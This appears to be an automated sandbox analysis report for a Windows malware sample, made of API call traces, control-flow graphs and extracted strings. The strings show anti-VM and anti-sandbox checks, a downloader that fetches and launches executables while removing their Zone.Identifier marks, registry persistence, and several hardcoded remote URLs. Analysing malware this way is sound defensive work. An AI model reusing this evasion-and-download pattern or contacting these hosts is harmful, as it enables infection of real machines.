                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040E447
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E453
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040E461
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040E4F1
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040E502
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E528
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E533
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040E5B2
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040E5C6
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040E5DA
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E5F7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040E606
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E646
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040E657
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E67E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E6A7
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E6B4
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E6C3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E6CB
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,?), ref: 0040E6D3
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E6EB
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E703
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E778
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E78B
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E796
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E7A2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7B3
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040E7C8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7D9
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E7EC
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 0040E817
                                                                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0040E8D4
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,0000001F,00000000,00000000), ref: 0040EB38
                                                                                                                                                                                                                          • SetTimer.USER32(00000000,?,?,004225B0), ref: 0040EB65
                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,0044A650,00000008,?,0044A660,?), ref: 0040EB8C
                                                                                                                                                                                                                          • KillTimer.USER32(00000000,00000000), ref: 0040EB99
                                                                                                                                                                                                                          • BeginPaint.USER32(0044A660,?), ref: 0040EBAE
                                                                                                                                                                                                                          • IsRectEmpty.USER32(?), ref: 0040EBBC
                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 0040EBCE
                                                                                                                                                                                                                          • SetTimer.USER32(0044A660,00000001,?,004225B0), ref: 0040EBEC
                                                                                                                                                                                                                          • EndPaint.USER32(0044A660,?), ref: 0040EBF4
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040EC12
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040EC3B
                                                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040EC57
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040EC6E
                                                                                                                                                                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00000001,00000001,00CC0020), ref: 0040ECB9
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040ECEA
                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0040ECF1
                                                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 0040ED25
                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0040ED53
                                                                                                                                                                                                                          • WindowFromPoint.USER32(?,?), ref: 0040ED67
                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040ED74
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040ED7C
                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0040ED8C
                                                                                                                                                                                                                          • GetCursor.USER32 ref: 0040ED96
                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0040EDA2
                                                                                                                                                                                                                          • GetCursor.USER32 ref: 0040EDAC
                                                                                                                                                                                                                          • StrRetToStrA.SHLWAPI(?,00000000,?), ref: 0040EDE5
                                                                                                                                                                                                                          • _printf.LIBCMT ref: 0040EDFB
                                                                                                                                                                                                                          • EnumFontFamiliesA.GDI32(00000000,00000000,?,00000000), ref: 0040EE24
                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 0040EE2A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040EF28
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040EF38
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040EF40
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040EF4C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040EF5B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F048
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F058
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F060
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F06C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F07B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F120
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F130
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F138
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F144
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F153
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Load$Create$Move$Window$Line$Rect$MessageSend$HandleIconModule$Client$BitmapImage$Object$Select$CursorFont$ColorIndirectText$BrushInvalidateItemSolid$Thread$Timer$AttachInputPaint$ActiveBeginCurrentDeleteDesktopEmptyEnumFamiliesFolderFromInfoKillMallocMenuPointPopupProcessStretchSystemTimeTrack_printf
                                                                                                                                                                                                                          • String ID: <$<$<$<$<$<$<$<$<$<$<$<$<$<$<
                                                                                                                                                                                                                          • API String ID: 246057343-461452962
                                                                                                                                                                                                                          • Opcode ID: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
                                                                                                                                                                                                                          • Instruction ID: a9c2557e841c6cb4aed079c13c2012efc5e0e09a695cb913e2437938431cc45a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1773C070548340AFE3348F60DC89FEB77B9FF99305F045929FA4992290D7B86845CB6A

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E27
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E3D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E53
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E69
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E7F
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00402E9F
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00402EB8
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EBE
                                                                                                                                                                                                                          • srand.MSVCRT ref: 00402EC5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402ED9
                                                                                                                                                                                                                          • rand.MSVCRT ref: 00402EE1
                                                                                                                                                                                                                          • rand.MSVCRT ref: 00402EF5
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00402F21
                                                                                                                                                                                                                          • InternetOpenW.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000000,00000000,00000000,00000000), ref: 00402F36
                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402F64
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00402F93
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,?,00000207,?), ref: 00402FC5
                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 00402FF4
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00403002
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403020
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 0040302F
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040303A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00403061
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040306D
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00403079
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00403084
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004030A7
                                                                                                                                                                                                                          • rand.MSVCRT ref: 004030AF
                                                                                                                                                                                                                          • rand.MSVCRT ref: 004030C3
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004030EF
                                                                                                                                                                                                                          • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040310B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403122
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403142
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00403151
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040315C
                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 00403171
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$File_snwprintf$CloseHandleInternetrand$Sleep$DeleteOpen$CountCreateDownloadEnvironmentExitExpandImageLoadStringsThreadTickWritesrand
                                                                                                                                                                                                                          • String ID: %hs$%ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                          • API String ID: 1494052058-3583034578
                                                                                                                                                                                                                          • Opcode ID: 1ad0d5694ba3353da19ccb1a57cf28654bca1c39efe4128642ffcffbbdb25b0c
                                                                                                                                                                                                                          • Instruction ID: 78f194360a85e13182315f20d4f49311ac3511ff64a984fe922711d5a5a3e9c0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ad0d5694ba3353da19ccb1a57cf28654bca1c39efe4128642ffcffbbdb25b0c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D88157719803186AEB209B60DC4AFDA777CBF04705F1444B6B749F60D1DA785B84CF99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 388 40317d-40321a GetModuleHandleA 389 403236-403242 Sleep 388->389 390 40321c-40322c GetProcAddress 388->390 392 40324b-40324f 389->392 390->389 391 40322e-403230 ExitProcess 390->391 393 403251-403258 call 401e97 392->393 394 40326c-403278 Sleep 392->394 397 40325d-403260 393->397 396 403281-403285 394->396 398 4032a2-4032a3 396->398 399 403287-403296 GetModuleHandleA 396->399 400 403262-403264 ExitProcess 397->400 401 40326a 397->401 402 4032a0 399->402 403 403298-40329a ExitProcess 399->403 401->392 402->396
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040320D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,wine_get_unix_file_name), ref: 00403224
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403230
                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00403238
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403264
                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0040326E
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00407204), ref: 0040328E
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040329A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$HandleModuleSleep$AddressProc
                                                                                                                                                                                                                          • String ID: dir_watch.dll$kernel32.dll$prl_cc.exe$prl_tools.exe$python.exe$pythonw.exe$sbiedll.dll$sbiedllx.dll$tpautoconnsvc.exe$vboxcontrol.exe$vboxservice.exe$vboxtray.exe$vmsrvc.exe$vmtoolsd.exe$vmusrvc.exe$vmwareservice.exe$vmwaretray.exe$vmwareuser.exe$wine_get_unix_file_name$wpespy.dll$xenservice.exe
                                                                                                                                                                                                                          • API String ID: 2350661518-2780004707
                                                                                                                                                                                                                          • Opcode ID: 2c99b960dabda3c5d574f0276161d8c334fbf934ae172afdc13c89edaa95b338
                                                                                                                                                                                                                          • Instruction ID: b154389cd1554f0ebcfe2a125868a98a7489832b6cac9f633827aa8e2f46737f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c99b960dabda3c5d574f0276161d8c334fbf934ae172afdc13c89edaa95b338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831A570D08248DBDB109FE4DD4869EBFB4BB05705F10806AE502BE2D4C7B86949CF9E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 498 479044-479074 GetPEB 499 479077-47909a 498->499 500 47909d-4790a0 499->500 501 4790a6-4790bc 500->501 502 4791ee-47922b CreateFileA 500->502 503 479110-479116 501->503 504 4790be-4790c5 501->504 519 479265-479269 502->519 520 47922d-479230 502->520 507 479129-47912f 503->507 508 479118-47911f 503->508 504->503 505 4790c7-4790ce 504->505 505->503 511 4790d0-4790d7 505->511 509 479131-479138 507->509 510 479148-47914e 507->510 508->507 512 479121-479124 508->512 509->510 514 47913a-479141 509->514 515 479167-47916f 510->515 516 479150-479157 510->516 511->503 517 4790d9-4790dd 511->517 513 4791bb-4791c0 512->513 522 4791c2-4791c5 513->522 523 4791e0-4791e9 513->523 514->510 521 479143-479146 514->521 525 479171-479178 515->525 526 479188-47918e 515->526 516->515 524 479159-479160 516->524 517->503 527 4790df-4790e3 517->527 528 479232-479238 520->528 521->513 522->523 529 4791c7-4791ca 522->529 523->500 524->515 530 479162-479165 524->530 525->526 531 47917a-479181 525->531 533 4791a7-4791ad 526->533 534 479190-479197 526->534 527->513 532 4790e9-47910b 527->532 536 479246-479252 WriteFile 528->536 537 47923a-479242 528->537 529->523 538 4791cc-4791cf 529->538 530->513 531->526 539 479183-479186 531->539 532->499 533->513 535 4791af-4791b6 533->535 534->533 540 479199-4791a0 534->540 535->513 541 4791b8 535->541 543 479255-479262 FindCloseChangeNotification WinExec 536->543 537->528 542 479244 537->542 538->523 544 4791d1-4791d4 538->544 539->513 540->533 546 4791a2-4791a5 540->546 541->513 542->543 543->519 544->523 547 4791d6-4791d9 544->547 546->513 547->523 548 4791db-4791de 547->548 548->502 548->523
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00479223
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,FFFADB8B,00003E00,?,00000000), ref: 00479252
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00479256
                                                                                                                                                                                                                          • WinExec.KERNEL32(?,00000005), ref: 00479262
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428993995.0000000000479000.00000040.00000001.01000000.00000003.sdmp, Offset: 00479000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_479000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                                                                                                                                                                                          • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XBVdJN.exe$athA$catA$dleA$el32$lstr$odul
                                                                                                                                                                                                                          • API String ID: 2234911746-4190719182
                                                                                                                                                                                                                          • Opcode ID: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
                                                                                                                                                                                                                          • Instruction ID: 58ba0b43668d7517482e7b7aa96e86c75ac4398e6d64cdf10e80ef0de2497ba1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89611774D002169BDF24CF94C888AEEB7B5FB44315F64C2ABD409AB701C7789E91CB99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 576 401e97-401eb0 CreateToolhelp32Snapshot 577 401eb2-401eb4 576->577 578 401eb9-401ed4 Process32First 576->578 581 401faa-401fab 577->581 579 401ed6-401ed8 578->579 580 401edd-401ef9 CharLowerA 578->580 579->581 582 401eff-401f15 580->582 583 401f17-401f1e 582->583 584 401f5a-401f5f 582->584 585 401f20-401f38 583->585 586 401f51-401f58 583->586 587 401f65-401f78 584->587 585->584 588 401f3a-401f4f 585->588 586->587 589 401f88-401f99 Process32Next 587->589 590 401f7a-401f86 CloseHandle 587->590 588->582 588->586 589->580 591 401f9f-401fa8 FindCloseChangeNotification 589->591 590->581 591->581
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00401EA4
                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 00401ECD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2353314856-0
                                                                                                                                                                                                                          • Opcode ID: baa32c9e9472e9a97a9285d9a223c18884870fe0319c7d5719627d5b91124817
                                                                                                                                                                                                                          • Instruction ID: 642ac0987f55ef775eea862af307b23bb9844e3de74e62916ff785c59642b288
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baa32c9e9472e9a97a9285d9a223c18884870fe0319c7d5719627d5b91124817
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B3134709002599FCF219B64CD847EABBB5AB18314F1002EAE949B62A1D7389F85DF08

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 272 40373e-403d01 call 4047c0 Sleep call 40317d CreateMutexA GetLastError 277 403d03-403d05 ExitProcess 272->277 278 403d0b-403dc7 memset * 3 GetModuleFileNameW _snwprintf DeleteFileW Sleep 272->278 280 403ed6-403f1a Sleep _snwprintf 278->280 281 403dcd-403e84 memset * 3 ExpandEnvironmentStringsW _snwprintf * 2 PathFileExistsW 278->281 284 403f20-403f39 280->284 282 403e86 281->282 283 403e8a-403e99 PathFileExistsW 281->283 282->280 285 403eaa-403ec2 CopyFileW 283->285 286 403e9b-403ea4 CreateDirectoryW 283->286 287 403f83-403f88 284->287 288 403f3b-403f43 284->288 292 403ec4 285->292 293 403ec6-403ecb Sleep 285->293 286->285 289 403f8e-403fa1 287->289 290 403f45-403f60 288->290 291 403f7a-403f81 288->291 295 403fa7-403fe5 SetFileAttributesW * 2 RegOpenKeyExW 289->295 296 40413b-404166 Sleep RegOpenKeyExW 289->296 290->287 294 403f62-403f78 290->294 291->289 292->280 292->293 294->284 294->291 297 404070-404090 RegOpenKeyExW 295->297 298 403feb-404000 295->298 299 404220-404240 RegOpenKeyExW 296->299 300 40416c-404199 RegQueryValueExW 296->300 301 404096-4040ab 297->301 302 40411b-404135 call 40206e Sleep ExitProcess 297->302 307 404006-404025 298->307 305 404246-404271 RegQueryValueExW 299->305 306 4043f8-404418 RegOpenKeyExW 299->306 303 404214-40421a RegCloseKey 300->303 304 40419b-4041b0 300->304 308 4040b1-4040d0 301->308 303->299 309 4041b6-4041d5 304->309 313 404291-4042b1 RegOpenKeyExW 305->313 314 404273-40428b RegSetValueExW 305->314 310 4044a6-4044c6 RegOpenKeyExW 306->310 311 40441e-404425 306->311 307->307 315 404027-40406a RegSetValueExW RegCloseKey 307->315 308->308 316 4040d2-404115 RegSetValueExW RegCloseKey 308->316 309->309 317 4041d7-40420e RegSetValueExW 309->317 322 404554-404574 RegOpenKeyExW 310->322 323 4044cc-4044d3 310->323 318 404434-40443b 311->318 320 4042b3-4042d3 RegCreateKeyExA 313->320 321 4042d9-4042f9 RegOpenKeyExW 313->321 314->313 315->297 316->302 317->303 326 40449a-4044a0 RegCloseKey 318->326 327 40443d-404470 RegQueryValueExW 318->327 320->321 328 4043ec-4043f2 RegCloseKey 321->328 329 4042ff-40432a RegQueryValueExW 321->329 324 404576-4045a1 RegQueryValueExW 322->324 325 4045cd-404602 Sleep CreateThread Sleep call 401fac 322->325 330 4044e2-4044e9 323->330 331 4045c1-4045c7 RegCloseKey 324->331 332 4045a3-4045bb RegSetValueExW 324->332 347 404604-404630 Sleep CreateThread Sleep 325->347 348 40466b-404670 Sleep 325->348 326->310 334 404472-404492 RegSetValueExW 327->334 335 404498 327->335 328->306 336 40434a-404375 RegQueryValueExW 329->336 337 40432c-404344 RegSetValueExW 329->337 338 404548-40454e RegCloseKey 330->338 339 4044eb-40451e RegQueryValueExW 330->339 331->325 332->331 334->335 335->318 342 404395-4043c0 RegQueryValueExW 336->342 343 404377-40438f RegSetValueExW 336->343 337->336 338->322 344 404520-404540 RegSetValueExW 339->344 345 404546 339->345 349 4043e0-4043e6 RegCloseKey 342->349 350 4043c2-4043da RegSetValueExW 342->350 343->342 344->345 345->330 352 40463f-404646 347->352 351 404676-40469b Sleep 348->351 349->328 350->349 355 4046a1-404707 Sleep memset _snprintf call 401cda Sleep 351->355 356 4047a2 351->356 352->348 354 404648-404669 Sleep call 401cda 352->354 354->352 362 404716-40471d 355->362 356->351 363 40479d 362->363 364 40471f-40477c Sleep memset _snprintf call 401674 362->364 363->356 367 404798 364->367 368 40477e-404792 CreateThread 364->368 367->362 368->367
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,?,?,?,00401182,00000000,?,0000000A), ref: 00403752
                                                                                                                                                                                                                            • Part of subcall function 0040317D: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040320D
                                                                                                                                                                                                                            • Part of subcall function 0040317D: GetProcAddress.KERNEL32(00000000,wine_get_unix_file_name), ref: 00403224
                                                                                                                                                                                                                            • Part of subcall function 0040317D: ExitProcess.KERNEL32 ref: 00403230
                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 00403CEA
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00403CF6
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403D05
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D2A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D40
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D56
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403D6C
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403D8A
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403D99
                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403DA4
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DF1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E07
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00403E28
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403E46
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403E6D
                                                                                                                                                                                                                          • PathFileExistsW.KERNELBASE(?), ref: 00403E7C
                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 00403EDB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.ru/, xrefs: 004038B1
                                                                                                                                                                                                                          • http://fiiauediehduefuge.biz/, xrefs: 00403C17
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.ru/, xrefs: 004038C5
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.in/, xrefs: 004039BF
